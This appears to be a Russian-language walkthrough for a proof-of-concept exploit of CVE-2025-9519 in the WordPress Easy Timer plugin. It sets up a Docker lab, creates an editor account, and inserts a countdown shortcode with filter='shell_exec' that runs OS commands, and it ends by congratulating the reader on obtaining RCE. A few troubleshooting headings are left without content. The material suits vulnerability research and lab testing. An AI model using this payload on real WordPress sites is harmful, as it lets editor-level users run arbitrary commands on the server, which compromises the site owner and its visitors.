
Эксплойт-доказательство концепции для CVE-2025-9519, демонстрирующий удалённое выполнение кода в плагине WordPress Easy Timer через специально сформированный фильтр шорткода, с настройкой на основе Docker.
Обратитесь к официальной документации Docker для установки: Docker Engine Install
Из каталога вашего проекта:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/Панель управления WordPress → → и нажмите .
ПлагиныEasy TimerАктивировать
Из каталога вашего проекта выполните следующую команду:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(примечание: замените на свои имя пользователя, адрес электронной почты и пароль!)
Записи → Добавить новуюШорткод и введите:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ Примечание: Убедитесь, что вы используете блок Шорткод, а не блок «Абзац», чтобы шорткод отображался корректно.

Поздравляем, вы получили RCE.

sudo docker ps
Вы должны увидеть что-то вроде:

Если шорткоды не отображаются:
Если при переходе по адресу http://localhost:8000/ отображается сообщение База данных не подключена: